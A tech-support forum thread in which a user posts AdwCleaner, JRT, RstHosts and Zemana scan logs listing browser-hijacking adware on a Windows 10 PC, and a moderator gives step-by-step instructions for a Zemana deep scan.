File Found: C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_nafaimnnclfjfedmmabolbppcngeolgf_0.localstorage
File Found: C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_npdicihegicnhaangkdmcgbjceoemeoo_0.localstorage


***** [ DLL ] *****

No malicious DLLs found.


***** [ WMI ] *****

No malicious keys found.


***** [ Shortcuts ] *****

Shortcut infected: C:\Users\Public\Desktop\Google Chrome.lnk ( hxxp://www%2dsearching.com/?prd=set_epc&s=FCVzamobl6629,153321d2-86ee-4d4a-aa39-bb74f5e87b7c, )
Shortcut infected: C:\Users\Public\Desktop\Mozilla Firefox.lnk ( hxxp://www-searching.com/?prd=set_epc&s=FCVzamobl6629,153321d2-86ee-4d4a-aa39-bb74f5e87b7c, )
Shortcut infected: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk ( hxxp://www%2dsearching.com/?prd=set_epc&s=FCVzamobl6629,153321d2-86ee-4d4a-aa39-bb74f5e87b7c, )
Shortcut infected: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk ( hxxp://www-searching.com/?prd=set_epc&s=FCVzamobl6629,153321d2-86ee-4d4a-aa39-bb74f5e87b7c, )
Shortcut infected: C:\Users\Nathan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome\Chrome App Launcher.lnk ( hxxp://www%2dsearching.com/?prd=set_epc&s=FCVzamobl6629,153321d2-86ee-4d4a-aa39-bb74f5e87b
Shortcut infected: C:\Users\Nathan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk ( hxxp://www%2dsearching.com/?prd=set_epc&s=FCVzamobl6629,153321d2-86ee-4d4a-aa39-bb74f5e87b7c,
Shortcut infected: C:\Users\Nathan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Chromium.lnk ( hxxp://www%2dsearching.com/?prd=set_epc&s=FCVzamobl6629,153321d2-86ee-4d4a-aa39-bb74f5e87b7c, )
Shortcut infected: C:\Users\Nathan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk ( hxxp://www%2dsearching.com/?prd=set_epc&s=FCVzamobl6629,153321d2-86ee-4d4a-aa39-bb74f5e87b7c, )
Shortcut infected: C:\Users\Nathan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk ( hxxp://www%2dsearching.com/?prd=set_epc&s=FCVzamobl6629,153321d2-86ee-4d4a-aa39-bb74f5e
Shortcut infected: C:\Users\Nathan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk ( hxxp://www-searching.com/?prd=set_epc&s=FCVzamobl6629,153321d2-86ee-4d4a-aa39-bb74f5e


***** [ Scheduled Tasks ] *****

Task Found: WindApp Update
Task Found: Selection Tools Update
Task Found: LuckyBrowse
Task Found: IBUpd2


***** [ Registry ] *****

Key Found: HKU\S-1-5-21-497135639-785806308-2055428636-1005\Software\Classes\BrowserAir.7IFBTTXUNBSV3MUX33P2I2XJ6A
Key Found: HKCU\Software\Classes\BrowserAir.7IFBTTXUNBSV3MUX33P2I2XJ6A
Key Found: [x64] HKCU\Software\Classes\BrowserAir.7IFBTTXUNBSV3MUX33P2I2XJ6A
Key Found: HKLM\SOFTWARE\Classes\AppID\{1BD47D21-01F4-4538-9290-39FD569A0F24}
Key Found: HKLM\SOFTWARE\Classes\AppID\{149622B2-F1C5-492D-BFDF-8E5ED85854A0}
Key Found: HKLM\SOFTWARE\Classes\CLSID\{44CBC005-6243-4502-8A02-3A096A282664}
Key Found: HKLM\SOFTWARE\Classes\CLSID\{80703783-E415-4EE3-AB60-D36981C5A6F1}
Key Found: HKLM\SOFTWARE\Classes\CLSID\{D4027C7F-154A-4066-A1AD-4243D8127440}
Key Found: HKLM\SOFTWARE\Classes\CLSID\{D8278076-BC68-4484-9233-6E7F1628B56C}
Key Found: HKLM\SOFTWARE\Classes\CLSID\{F297534D-7B06-459D-BC19-2DD8EF69297B}
Key Found: HKLM\SOFTWARE\Classes\CLSID\{F83D1872-D9FF-47F8-B5A0-49CC51E24EE8}
Key Found: HKLM\SOFTWARE\Classes\Interface\{80703783-E415-4EE3-AB60-D36981C5A6F1}
Key Found: HKLM\SOFTWARE\Classes\Interface\{884189CF-7C10-41E8-A014-F7B2BE40AADB}
Key Found: HKLM\SOFTWARE\Classes\Interface\{BD125908-5F10-409F-9C01-F2207CA18887}
Key Found: HKLM\SOFTWARE\Classes\TypeLib\{9945959C-AAD8-4312-8B57-2DE11927E770}
Key Found: HKLM\SOFTWARE\Classes\TypeLib\{EEA63863-87BC-4DCA-A5B5-EB97E3B04806}
Key Found: HKLM\SOFTWARE\Classes\TypeLib\{A5FF3EB5-BF62-4D59-84DF-DC518E46FCB3}
Key Found: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{D4027C7F-154A-4066-A1AD-4243D8127440}
Key Found: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{D4027C7F-154A-4066-A1AD-4243D8127440}
Value Found: HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser [{D4027C7F-154A-4066-A1AD-4243D8127440}]
Key Found: HKU\.DEFAULT\Software\AskPartnerNetwork
Key Found: HKU\S-1-5-21-497135639-785806308-2055428636-1005\Software\AskPartnerNetwork
Key Found: HKU\S-1-5-21-497135639-785806308-2055428636-1005\Software\BrowserAir
Key Found: HKU\S-1-5-21-497135639-785806308-2055428636-1005\Software\CoinisRS
Key Found: HKU\S-1-5-21-497135639-785806308-2055428636-1005\Software\DAILYPCCLEAN
Key Found: HKU\S-1-5-21-497135639-785806308-2055428636-1005\Software\Microsoft\Tinstalls
Key Found: HKU\S-1-5-21-497135639-785806308-2055428636-1005\Software\PRODUCTSETUP
Key Found: HKU\S-1-5-21-497135639-785806308-2055428636-1005\Software\SlimWare Utilities Inc
Key Found: HKU\S-1-5-21-497135639-785806308-2055428636-1005\Software\WajIEnhance
Key Found: HKU\S-1-5-21-497135639-785806308-2055428636-1005\Software\WTools
Key Found: HKU\S-1-5-21-497135639-785806308-2055428636-1005\Software\AppDataLow\Software\TrailerTime
Key Found: HKU\S-1-5-18\Software\AskPartnerNetwork
Key Found: HKCU\Software\AskPartnerNetwork
Key Found: HKCU\Software\BrowserAir
Key Found: HKCU\Software\CoinisRS
Key Found: HKCU\Software\DAILYPCCLEAN
Key Found: HKCU\Software\Microsoft\Tinstalls
Key Found: HKCU\Software\PRODUCTSETUP
Key Found: HKCU\Software\SlimWare Utilities Inc
Key Found: HKCU\Software\WajIEnhance
Key Found: HKCU\Software\WTools
Key Found: HKCU\Software\AppDataLow\Software\TrailerTime
Key Found: HKLM\SOFTWARE\SLIMWARE UTILITIES, INC.
Key Found: HKLM\SOFTWARE\AmazingTab
Key Found: HKLM\SOFTWARE\AskPartnerNetwork
Key Found: HKLM\SOFTWARE\LuckyBrowse
Key Found: HKLM\SOFTWARE\SlimWare Utilities Inc
Key Found: HKLM\SOFTWARE\SwiftSearch_1.10.0.25
Key Found: HKLM\SOFTWARE\Tutorials
Key Found: HKLM\SOFTWARE\WindoWeather
Key Found: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
Key Found: [x64] HKCU\Software\AskPartnerNetwork
Key Found: [x64] HKCU\Software\BrowserAir
Key Found: [x64] HKCU\Software\CoinisRS
Key Found: [x64] HKCU\Software\DAILYPCCLEAN
Key Found: [x64] HKCU\Software\Microsoft\Tinstalls
Key Found: [x64] HKCU\Software\PRODUCTSETUP
Key Found: [x64] HKCU\Software\SlimWare Utilities Inc
Key Found: [x64] HKCU\Software\WajIEnhance
Key Found: [x64] HKCU\Software\WTools
Key Found: [x64] HKCU\Software\AppDataLow\Software\TrailerTime
Key Found: [x64] HKLM\SOFTWARE\SLIMWARE UTILITIES, INC.
Key Found: [x64] HKLM\SOFTWARE\AmazingTab
Key Found: [x64] HKLM\SOFTWARE\AskPartnerNetwork
Key Found: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{70AA5E57-6A21-42B8-9B5F-8F071CC265AD}
Key Found: HKLM\SOFTWARE\Classes\Installer\Features\75E5AA0712A68B24B9F5F870C12C56DA
Key Found: HKLM\SOFTWARE\Classes\Installer\Products\75E5AA0712A68B24B9F5F870C12C56DA
Key Found: HKLM\SOFTWARE\Classes\Installer\UpgradeCodes\7AB5857A57A0687786597A857BFFFFFF
Key Found: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\75E5AA0712A68B24B9F5F870C12C56DA
Key Found: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8036C72171EF4ba46856BF57969F6A36
Key Found: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\89BB7852687BDC34B9A81E01C7FF9173
Key Found: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8CBC85D72B148084ABE8C2F072F781F4
Key Found: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8CC5A38A64D6098468BC8395BA0EFF03
Key Found: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8DF9A1AC557F56c49B56F6B83E293C15
Key Found: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A97C590397DCC454AA8923563BAB10E4
Key Found: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B08932C78B697C244BE7BA3E6FF09B62
Key Found: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CFA51B44D54927c4E9B7BC1D3FD1E49F
Key Found: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D14A7F65792054F418578C78367D13F7
Key Found: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DFE9F0BD163D827438CB6AD6B100EC48
Key Found: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F739A19A8327dc64C9A8B641A9E89646
Key Found: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\158D6D9E3FE81fa428925F22ACB3A965
Key Found: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\15E6C514FEFC09f45BAFAAE1D7546ED4
Key Found: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1DB42320A8525634AA089F0BEC86473B
Key Found: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\22468B0D6050b2e46B9C4B67A8F59577
Key Found: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2251BF05A2F606d43BB064BD63CBD87E
Key Found: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3255D95681398614190EDF0A4F3F77DB
Key Found: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3CDF313E9B28c944FBC7579CF4949414
Key Found: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\71E54748EDD3dc1468548785DC856EDA
Key Found: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\754590DD06DE8d249B526503432F99D4
Key Found: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\75E5AA0712A68B24B9F5F870C12C56DA
Key Found: [x64] HKLM\SOFTWARE\Classes\Installer\Features\75E5AA0712A68B24B9F5F870C12C56DA
Key Found: [x64] HKLM\SOFTWARE\Classes\Installer\Products\75E5AA0712A68B24B9F5F870C12C56DA
Key Found: [x64] HKLM\SOFTWARE\Classes\Installer\UpgradeCodes\7AB5857A57A0687786597A857BFFFFFF
Key Found: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\7AB5857A57A0687786597A857BFFFFFF
Data Found: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page] - hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRggQJgoLBF9HEBgbIgsLTA1DQ1EOeQ4ABRQVRANAcAkKWABDFQAFIk0FA1ADB0VXfVBdFElXTwhwJVx1D
Value Found: HKU\S-1-5-21-497135639-785806308-2055428636-1005\Software\Microsoft\Internet Explorer\SearchScopes [DoNotAskAgain]
Key Found: HKU\S-1-5-21-497135639-785806308-2055428636-1005\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
Key Found: HKU\S-1-5-21-497135639-785806308-2055428636-1005\Software\Microsoft\Internet Explorer\SearchScopes\{32E98164-40B2-4791-B233-4CBCE3F2A4F3}
Key Found: HKU\S-1-5-21-497135639-785806308-2055428636-1005\Software\Microsoft\Internet Explorer\SearchScopes\{6586d803-df30-46d3-a89a-4136c8571d45}
Key Found: HKU\S-1-5-21-497135639-785806308-2055428636-1005\Software\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}
Value Found: HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DoNotAskAgain]
Key Found: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
Key Found: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{32E98164-40B2-4791-B233-4CBCE3F2A4F3}
Key Found: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{6586d803-df30-46d3-a89a-4136c8571d45}
Key Found: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}
Value Found: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DoNotAskAgain]
Key Found: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
Key Found: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{32E98164-40B2-4791-B233-4CBCE3F2A4F3}
Key Found: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{6586d803-df30-46d3-a89a-4136c8571d45}
Key Found: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}
Value Found: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes [DoNotAskAgain]
Key Found: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
Data Found: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes [DefaultScope] -
Key Found: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6586d803-df30-46d3-a89a-4136c8571d45}
Key Found: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\castplatform.com
Key Found: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\cdn.castplatform.com
Key Found: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\land.pckeeper.software
Key Found: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\pckeeper.software
Key Found: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\castplatform.com
Key Found: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\cdn.castplatform.com
Key Found: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\land.pckeeper.software
Key Found: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\pckeeper.software
Value Found: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [ApnTBMon]
Value Found: HKU\S-1-5-21-497135639-785806308-2055428636-1005\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [Bubble Dock]
Value Found: HKU\S-1-5-21-497135639-785806308-2055428636-1005\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [Selection Tools]
Value Found: HKU\S-1-5-21-497135639-785806308-2055428636-1005\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [WindApp]
Value Found: HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION [Selection Tools.exe]
Value Found: HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION [ExploreTech.exe]
Key Found: HKLM\SOFTWARE\Microsoft\MediaPlayer\ShimInclusionList\BrowserAir.exe
Key Found: HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E
Value Found: HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION [DeskBar.exe]
Key Found: HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\BrowserAir.exe
Value Found: HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION [Selection Tools.exe]
Key Found: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f
Key Found: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f
Key Found: HKLM\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f
Key Found: HKLM\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f
Key Found: HKLM\SOFTWARE\Google\Chrome\Extensions\npdicihegicnhaangkdmcgbjceoemeoo
Key Found: HKCU\Software\Google\Chrome\Extensions\jlcgehabolcakkjhgmgpkagpolbjlhfa
Key Found: [x64] HKCU\Software\Google\Chrome\Extensions\jlcgehabolcakkjhgmgpkagpolbjlhfa
Key Found: HKLM\SOFTWARE\Google\Chrome\Extensions\edfhabmbbhdcdpnoilchepfojmdeannd
Key Found: [x64] HKLM\SOFTWARE\Google\Chrome\Extensions\edfhabmbbhdcdpnoilchepfojmdeannd
Key Found: HKCU\Software\Google\Chrome\Extensions\ljibkigjccbegnbeojkoafejpoiachej
Key Found: HKLM\SOFTWARE\Google\Chrome\Extensions\ljibkigjccbegnbeojkoafejpoiachej
Key Found: [x64] HKCU\Software\Google\Chrome\Extensions\ljibkigjccbegnbeojkoafejpoiachej
Key Found: [x64] HKLM\SOFTWARE\Google\Chrome\Extensions\ljibkigjccbegnbeojkoafejpoiachej


***** [ Web browsers ] *****

No malicious Firefox based browser items found.
Chrome pref Found: [C:\Users\Nathan\AppData\Local\Chromium\User Data\Default\Web data] - palikan
Chrome pref Found: [C:\Users\Nathan\AppData\Local\Chromium\User Data\Default\Secure Preferences] - hxxp://www.palikan.com/?f=7&a=plk_coinisrs_15_53&cd=2XzuyEtN2Y1L1Qzu0CyE0EzyzzyEyEyD0EtA0FtDzzzzyB0DtN0D0Tzu0StCyEyCtDtN1
Chrome pref Found: [C:\Users\Nathan\AppData\Local\Chromium\User Data\Default\Secure Preferences ] - edfhabmbbhdcdpnoilchepfojmdeannd
Chrome pref Found: [C:\Users\Nathan\AppData\Local\Chromium\User Data\Default\Secure Preferences ] - jlcgehabolcakkjhgmgpkagpolbjlhfa
Chrome pref Found: [C:\Users\Nathan\AppData\Local\Chromium\User Data\Default\Secure Preferences ] - ljibkigjccbegnbeojkoafejpoiachej
Chrome pref Found: [C:\Users\Nathan\AppData\Local\Chromium\User Data\Default\Secure Preferences ] - npdicihegicnhaangkdmcgbjceoemeoo
Chrome pref Found: [C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Web data] - uk.ask.com
Chrome pref Found: [C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Web data] - searchinterneat-a.akamaihd.net
Chrome pref Found: [C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Web data] - palikan.com
Chrome pref Found: [C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Web data] - www-searching.com
Chrome pref Found: [C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Web data] - trovi.search
Chrome pref Found: [C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences ] - booedmolknjekdopkepjjeckmjkdpfgl
Chrome pref Found: [C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences ] - edfhabmbbhdcdpnoilchepfojmdeannd
Chrome pref Found: [C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences ] - flpcjncodpafbgdpnkljologafpionhb
Chrome pref Found: [C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences ] - jlcgehabolcakkjhgmgpkagpolbjlhfa
Chrome pref Found: [C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences ] - libedajeiljdoodmokbppgapcfbignci
Chrome pref Found: [C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences ] - ljibkigjccbegnbeojkoafejpoiachej
Chrome pref Found: [C:\Users\Nathan\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences ] - npdicihegicnhaangkdmcgbjceoemeoo

*************************

C:\AdwCleaner\AdwCleaner[S0].txt - [22279 Bytes] - [11/12/2016 17:04:45]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [22353 Bytes] ##########


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.9 (09.30.2016)
Operating System: Windows 10 Home x64
Ran by Nathan (Administrator) on 11/12/2016 at 17:08:42.91
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 0




Registry: 0





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 11/12/2016 at 17:09:54.57
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-|x| RstHosts v2.0 - Rapport créé le 11/12/2016 à 17:16:37
-|x| Système d'exploitation : Windows 10 Home (64 bits)
-|x| Nom d'utilisateur : Nathan - DESKTOP-5GKAVDH (Administrateur)

-|x|- Informations -|x|-

Emplacement : C:\WINDOWS\System32\drivers\etc\hosts
Attribut(s) : RASH
Propriétaire : Administrators - BUILTIN
Taille : 89 bytes
Date de création : 10/07/2015 - 11:04:34
Date de modification : 11/12/2016 - 17:16:27
Date de dernier accès : 11/12/2016 - 17:16:27

-|x|- Contenu du fichier -|x|-

# Fichier Hosts créé par RstHosts

127.0.0.1 localhost
::1 localhost

-|x|- E.O.F - C:\RstHosts.txt - 611 bytes -|x|-
 
  • Like
Reactions: Malnutrition

Malnutrition

Malnurished Mod
Moderator
Security Team
Jul 22, 2016
3,395
551
How are things running now?

Zemana Deep Scan.

  • Right click on Zemana and run as admin.
  • Click the Cog/Sproket Wheel, at the top right of Zemana
  • Select Advanced - I have read the warning and wish to proceed.
  • Place a tick next to Detect Suspicious (Root CA) Certificates.
  • Then click the house icon in Zemana.
  • Then hit your start button at the lower left hand corner of your desktop.
  • Then left click on Computer.
  • Drag Local Disk C: Into the area of Zemana that reads Drag and drop files here to scan them.
  • Once the scan has completed click graph icon on the top right of the programs User interface.
  • Double click to open the latest log-file.
  • Copy it to your clipboard.
  • Post the log here in your next reply.
 

Malnutrition

Malnurished Mod
Moderator
Security Team
Jul 22, 2016
3,395
551
Also, the adware cleaner log is indicating that you did not use the clean option, did you remove the items found?
 

Nathan Turnock

PCHF Member
PCHF Member
Dec 11, 2016
6
3
18
Here you go,

Zemana AntiMalware 2.70.2.118 (Installed)

-------------------------------------------------------
Scan Result : Completed
Scan Date : 2016/12/12
Operating System : Windows 10 64-bit
Processor : 8X Intel(R) Core(TM) i7-4790K CPU @ 4.00GHz
BIOS Mode : UEFI
CUID : 12A6D785761392B36F6726
Scan Type : Custom Scan
Duration : 9m 52s
Scanned Objects : 970972
Detected Objects : 49
Excluded Objects : 0
Read Level : SCSI
Auto Upload : Enabled
Detect All Extensions : Disabled
Scan Documents : Disabled
Domain Info : WORKGROUP,0,2

Detected Objects
-------------------------------------------------------

MSI9E00.tmp
Status : Scanned
Object : %systemroot%\installer\msi9e00.tmp
MD5 : 5F877D4957B9E034FD4B66E048D44ED6
Publisher : Ask.com
Size : 3325832
Version : 1.11.3.0
Detection : Adware:Win32/AskBrowserHijack!Ep
Cleaning Action : Quarantine
Related Objects :
File - %systemroot%\installer\msi9e00.tmp

MSI96F8.tmp
Status : Scanned
Object : %systemroot%\installer\msi96f8.tmp
MD5 : 0CFE2496E19FC81F5572DC2945008120
Publisher : Ask.com
Size : 301400
Version : 1.8.0.0
Detection : Adware:Win32/AskBrowserHijack!Ep
Cleaning Action : Quarantine
Related Objects :
File - %systemroot%\installer\msi96f8.tmp

TEW2013.exe
Status : Scanned
Object : %chrome_probed_program_files_path%\gds\tew2013\tew2013.exe
MD5 : 48F00405835D83892F111440EE4A11CC
Publisher : -
Size : 51044352
Version : 1.2.0.0
Detection : Heur.Malicious!Pc
Cleaning Action : Report as safe
Related Objects :
File - %chrome_probed_program_files_path%\gds\tew2013\tew2013.exe
Reference - C:\Users\Nathan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\TEW2013\TEW2013.lnk

chrome.dll
Status : Scanned
Object : NE->c:\adwcleaner\quarantine\files\hprastnulsdjtvofwryjcaxuvnrrkela\application\44.5.0.2\chrome.dll
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/BrowserAir!Neng
Cleaning Action : Quarantine
Related Objects :
(null) - (null)

chrome_child.dll
Status : Scanned
Object : NE->c:\adwcleaner\quarantine\files\hprastnulsdjtvofwryjcaxuvnrrkela\application\44.5.0.2\chrome_child.dll
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/BrowserAir!Neng
Cleaning Action : Quarantine
Related Objects :
(null) - (null)

chrome_elf.dll
Status : Scanned
Object : NE->c:\adwcleaner\quarantine\files\hprastnulsdjtvofwryjcaxuvnrrkela\application\44.5.0.2\chrome_elf.dll
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/BrowserAir!Neng
Cleaning Action : Quarantine
Related Objects :
(null) - (null)

setup.exe
Status : Scanned
Object : NE->c:\adwcleaner\quarantine\files\hprastnulsdjtvofwryjcaxuvnrrkela\application\44.5.0.2\installer\setup.exe
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/BrowserAir!Neng
Cleaning Action : Quarantine
Related Objects :
(null) - (null)

metro_driver.dll
Status : Scanned
Object : NE->c:\adwcleaner\quarantine\files\hprastnulsdjtvofwryjcaxuvnrrkela\application\44.5.0.2\metro_driver.dll
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/BrowserAir!Neng
Cleaning Action : Quarantine
Related Objects :
(null) - (null)

nacl64.exe
Status : Scanned
Object : NE->c:\adwcleaner\quarantine\files\hprastnulsdjtvofwryjcaxuvnrrkela\application\44.5.0.2\nacl64.exe
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/BrowserAir!Neng
Cleaning Action : Quarantine
Related Objects :
(null) - (null)

browserair.exe
Status : Scanned
Object : NE->c:\adwcleaner\quarantine\files\hprastnulsdjtvofwryjcaxuvnrrkela\application\browserair.exe
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/BrowserAir!Neng
Cleaning Action : Quarantine
Related Objects :
(null) - (null)

APNSetup.exe
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\apnsetup.exe
MD5 : B763782BEB7D4BE135B493A66AE2C841
Publisher : APN LLC
Size : 509872
Version : 7.5.0.5
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\apnsetup.exe

UnifiedLogger.dll
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\hxxgudxfntwjwkagqwzaqjjwmihkuszl\unifiedlogger.dll
MD5 : A8BAC41D8B719BFBD53A81A1556BA479
Publisher : Slimware Utilities Holdings, Inc.
Size : 233152
Version : 4.1.1.0
Detection : Scareware:Win32/FakeOptimizer!Ep
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\hxxgudxfntwjwkagqwzaqjjwmihkuszl\unifiedlogger.dll

SlimServiceFactory.exe
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\hxxgudxfntwjwkagqwzaqjjwmihkuszl\slimservicefactory.exe
MD5 : 8FA224ABCBAD1FB5337CEC06431EB922
Publisher : Slimware Utilities Holdings, Inc.
Size : 252096
Version : 1.1.0.0
